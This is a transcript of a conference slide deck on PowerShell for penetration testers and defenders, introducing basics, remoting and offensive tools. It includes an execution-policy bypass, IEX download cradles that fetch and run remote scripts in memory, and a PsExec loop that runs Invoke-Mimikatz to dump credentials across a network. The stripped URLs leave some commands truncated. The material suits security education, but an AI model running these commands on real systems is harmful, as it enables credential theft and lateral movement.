Presentation is loading. Please wait.

Presentation is loading. Please wait.

PowerShell for Cyber Warriors

Published byGeorge Hodges Modified over 8 years ago

Similar presentations

Presentation on theme: "PowerShell for Cyber Warriors"— Presentation transcript:

1 PowerShell for Cyber Warriors
Image: ABSTRACT: Powershell, the new hotness, is an interactive object-oriented command environment that has revolutionized the ability to interact with the Windows operating systems in a programmatic manner. This environment significantly increases the capabilities of administrators, attackers, defenders, and malware authors alike. This presentation introduces popular PowerShell tools and techniques used by penetration testers and blue team members. Tools range from in-memory only remote administration tools to Active Directory enumeration and from reverse engineering to incident response. Additionally, we will review a couple of pieces of malware that leverage PowerShell and provide information on detecting or defending against previously discussed attacks. If you're a CyberWarrior, this presentation will undoubtedly up your game by equipping you with knowledge on the almighty PowerShell. PowerShell for Cyber Warriors by Russel Van Tuyl

2 Who Am I? Security Analyst TN Air National Guard SANS MSISE Student
Father of 2, Husband to 1 @Ne0nd0g A little information about me: -I’m a Security Analyst w Sword & Shield here in Knoxville. -I primarily do network vulnerability assessments and penetration testing -I’m a member of the TN ANG here in Knoxville as well -SANS Master of Science Information Security Engineering -You can reach me by or at Twitter

3 Disclaimer DISCLAIMER
Don’t believe anything I say; verify for yourself If I have something wrong, please let me know; I make mistakes just as everyone does

4 What is PowerShell? Image: Ref: Windows PowerShell is an interactive object-oriented command environment with scripting language features that utilizes small programs called cmdlets to simplify configuration, administration, and management of heterogeneous environments in both standalone and networked typologies by utilizing standards-based remoting protocols.

5 PowerShell Basics powershell.exe Built on .NET Framework Verb-Noun
Tab Complete Alias Structured Data/Objects Syntax Highlighting (version 5) Released in 2006 on XP*/Vista/Server 2003 .ps1 Modules .psm1 Integrated Scripting Environment (ISE) Powershell.exe replaces the need to use cmd.exe . You can first open cmd.exe and then run powershell.exe for an interactive session Powershell has full access to the .NET framework Commands on the system follow a Verb-Noun structure Have you ever tried to ‘ls’ on a Windows box? Well, it works just fine in PowerShell thanks to aliases PowerShell utilizes structured data objects. This allows you to better handle data. This way you don’t have to try and detect where the data you want is at in the output. Version 5 (Windows 10/Server 2016) comes with syntax highlighting PowerShell was first released in 2006 and installed by default on Windows Vista PoweShell scripts are saved into .ps1 files. It is important to note that you can’t double-click and run these .ps1 file PowerShell comes with a built-in IDE, called the PowerShell ISE

6 PowerShell Basics Get-Help Get-Help is an essential command to know. Use it to find out more about any command you wish to run.

7 PowerShell Basics Get-Member Use the Get-Member cmdlet to get an objects methods, properties, and other attributes

8 Use Cases Powerful tool for interacting with Windows PSRemoting
Why it is used Powerful tool for interacting with Windows PSRemoting Future SSH Integration Antivirus/Application Blacklisting Bypass Red Team Blue Team Malware In Memory only execution IEX Download Cradle Image: Ref: Because of the ability to use the .Net library, write scripts, and interact with objects, PowerShell is an invaluable tool for interacting with Windows PSRemoting allows you to remotely access a system. You can also run a script from your local machine one time across many computer in a domain or network Powershell.exe is usually overlooked by antivirus and application restrictions; This makes it a great choice to use by attackers Red teams are using it for attack and Blue teams are using it for response; Malware is using it for evil Powershell code can be downloaded into memory and executed using the IEX download cradle; This prevents writing files to disk

9 PSRemoting Disabled by default Enable-PSRemoting –Force Trusted hosts
5985 (HTTP)/5986 (HTTPS) 47001 Invoke-Command Enter-PSSession A screen shot of establishing a PSRemoting session to and subsequently running a few commands Must set trusted hosts on BOTH computers if not on a domain: Set-Item wsman:\localhost\client\trustedhosts * Ref:

10 Module & Script Loading
Execution Policy The execution policy determines if PowerShell scripts can be run on a host. Change it to Unrestricted to run PowerShell scripts on a lab host. If you can’t change the execution policy, you can bypass it with powerShell.exe -ExecutionPolicy Bypass -File .runme.ps1 PowerShell modules (.psm1 files) can be imported using the Import-Module function. Additionally, .ps1 files can be imported using dot sourcing (. .\script.ps1). The IEX download cradle is an essential tool for downloading PowerShell scripts from a remote host into memory. You can terminate the command with an semicolon and immediately run a command from the script. IEX (New-Object System.Net.Webclient).DownloadString(' -h Ref: Import-Module Dot Sourcing IEX Download Cradle

11 IEX Download Cradle IEX (New-Object Net.WebClient).DownloadString(' Invoke-Mimikatz -DumpCreds A screenshot of the IEX download cradle being used to download InvokeMimikatz.ps1 its GitHub repository and then executed on a Windows 7 host. Clear-text creds are in the red box. expanded is:

12 Mass Mimikatz Part 3 A blog post I wrote on doing Mimikatz en masse across a large network. This blog post outlines how I used a PowerShell ForEach loop to download Invoke-Mimikatz.ps1 with the IEX download cradle. The output is then saved to a network share. A python script was written to parse all the files.

13 Mass Mimikatz Part 3 ForEach ($h in Get-Content C:\hosts.txt){C:\PsExec.exe \\$h -d -e -u ACME\bob -p -s cmd /c powershell -nop -command “& {IEX ((new-object net.webclient).downloadstring(‘\\ \data\Invoke-Mimikatz.ps1′));Invoke-Mimikatz -DumpCreds > \\ \data\%COMPUTERNAME%.txt}”} Powershell statement for Mass Mimikatz

14 Mass Mimikatz Part 3

15 PowerShell Tools - Attack
PowerShellArsenal PowerShell Suite PowerMemory PowerShell-AD-Recon Fathomless OffensivePowerShellTasking PoshRat Metasploit DSInternals DSCompromised OWA-Toolkit Empire - a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture PowerSploit - collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment PowerTools - a collection of PowerShell projects with a focus on offensive operations. Kansa - A modular incident response framework Nishang - a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing PowerCat – Netcat in PowerShell Inveight - LLMNR/NBNS spoofer PowerShellArsenal - a PowerShell module used to aid a reverse engineer Subvert-PE.ps1 - programmatically injecting shellcode into PE executables on disk Now part of “PowerShell Suite” PowerMemory - Exploit the credentials present in files and memory Image: PowerSploit Nishang PowerCat Inveigh Empire Kansa DarkObserver PowerPath

16 Procrastination I’ll do it later… Image: This is about as far as I made it before we were asked to turn our slides in. Sorry about that! I do have a solution though. Visit to grab the completed copy of the presentation for B-Sides Knoxville Well maybe.

17 Conclusion Image:

Download ppt "PowerShell for Cyber Warriors"

Similar presentations

POWERSHELL SHENANIGANS LATERAL MOVEMENT WITH POWERSHELL KIERAN JACOBSEN READIFY.

POWERSHELL SHENANIGANS LATERAL MOVEMENT WITH POWERSHELL KIERAN JACOBSEN READIFY.
$$ Idea Updatable help system Method overload discovery HelpUri attribute support HelpFile property on FunctionInfo Simplified Where and.

$$ Idea Updatable help system Method overload discovery HelpUri attribute support HelpFile property on FunctionInfo Simplified Where and.
MCDST 70-271: Supporting Users and Troubleshooting a Microsoft Windows XP Operating System Chapter 6: Configure and Troubleshoot Local User and Group Accounts.

MCDST : Supporting Users and Troubleshooting a Microsoft Windows XP Operating System Chapter 6: Configure and Troubleshoot Local User and Group Accounts.
 What is Powershell?  Why Powershell?  What is new in Powershell 2.0?  Advanced Functions  Modules  Remoting  Eventing  Background Jobs  Power.

 What is Powershell?  Why Powershell?  What is new in Powershell 2.0?  Advanced Functions  Modules  Remoting  Eventing  Background Jobs  Power.
Great people, great experience, great passion Administering SharePoint with Windows PowerShell Go Beyond the Management Shell with SharePoint and Windows.

Great people, great experience, great passion Administering SharePoint with Windows PowerShell Go Beyond the Management Shell with SharePoint and Windows.
Managing Active Directory with PowerShell JOSEPH MOODY.

Managing Active Directory with PowerShell JOSEPH MOODY.
10 PowerShell Commands Every Admin Should Know David Price.

10 PowerShell Commands Every Admin Should Know David Price.
Enterprise Network Security Accessing the WAN Lecture week 4.

Enterprise Network Security Accessing the WAN Lecture week 4.
Welcome Course 20410B Module 0: Introduction Audience

Welcome Course 20410B Module 0: Introduction Audience
Windows 2008 Overview Lecture 1. Windows Networking Evolution Windows for Workgroups – peer-to-peer networking built into the OS Windows NT – separate.

Windows 2008 Overview Lecture 1. Windows Networking Evolution Windows for Workgroups – peer-to-peer networking built into the OS Windows NT – separate.
Deployment and Configuration Management Solution

Deployment and Configuration Management Solution
#BSidesCMH PowerShell Copyright (C) 2014 ColumbusBSides. PowerShell: Drink the Kool-Aid.

#BSidesCMH PowerShell Copyright (C) 2014 ColumbusBSides. PowerShell: Drink the Kool-Aid.
PowerShell Lessons Learned from Building an Automated SQL Installation and Patch Management Implementation Presented by: Fany Carolina Vargas, Microsoft.

PowerShell Lessons Learned from Building an Automated SQL Installation and Patch Management Implementation Presented by: Fany Carolina Vargas, Microsoft.
Adding a Module The Import-Module cmdlet  Can be used to load any external module into PowerShell.  Uses the following syntax to add the ActiveDirectory.

Adding a Module The Import-Module cmdlet  Can be used to load any external module into PowerShell.  Uses the following syntax to add the ActiveDirectory.
Hands-On Microsoft Windows Server 2008 Chapter 1 Introduction to Windows Server 2008.

Hands-On Microsoft Windows Server 2008 Chapter 1 Introduction to Windows Server 2008.
Technology Overview. Agenda What’s New and Better in Windows Server 2003? Why Upgrade to Windows Server 2003 ?  From Windows NT 4.0  From Windows 2000.

Technology Overview. Agenda What’s New and Better in Windows Server 2003? Why Upgrade to Windows Server 2003 ?  From Windows NT 4.0  From Windows 2000.
Microsoft ® Official Course Module XA Using Windows PowerShell ®

Microsoft ® Official Course Module XA Using Windows PowerShell ®
PowerShell Basics. o PowerShell is a great way to manipulate server and/or workstation components o It’s geared toward system administrators by creating.

PowerShell Basics. o PowerShell is a great way to manipulate server and/or workstation components o It’s geared toward system administrators by creating.
Appendix A Starting Out with Windows PowerShell™ 2.0.

Appendix A Starting Out with Windows PowerShell™ 2.0.
PowerShell Shenanigans Lateral Movement with PowerShell

PowerShell Shenanigans Lateral Movement with PowerShell

Similar presentations

Ads by Google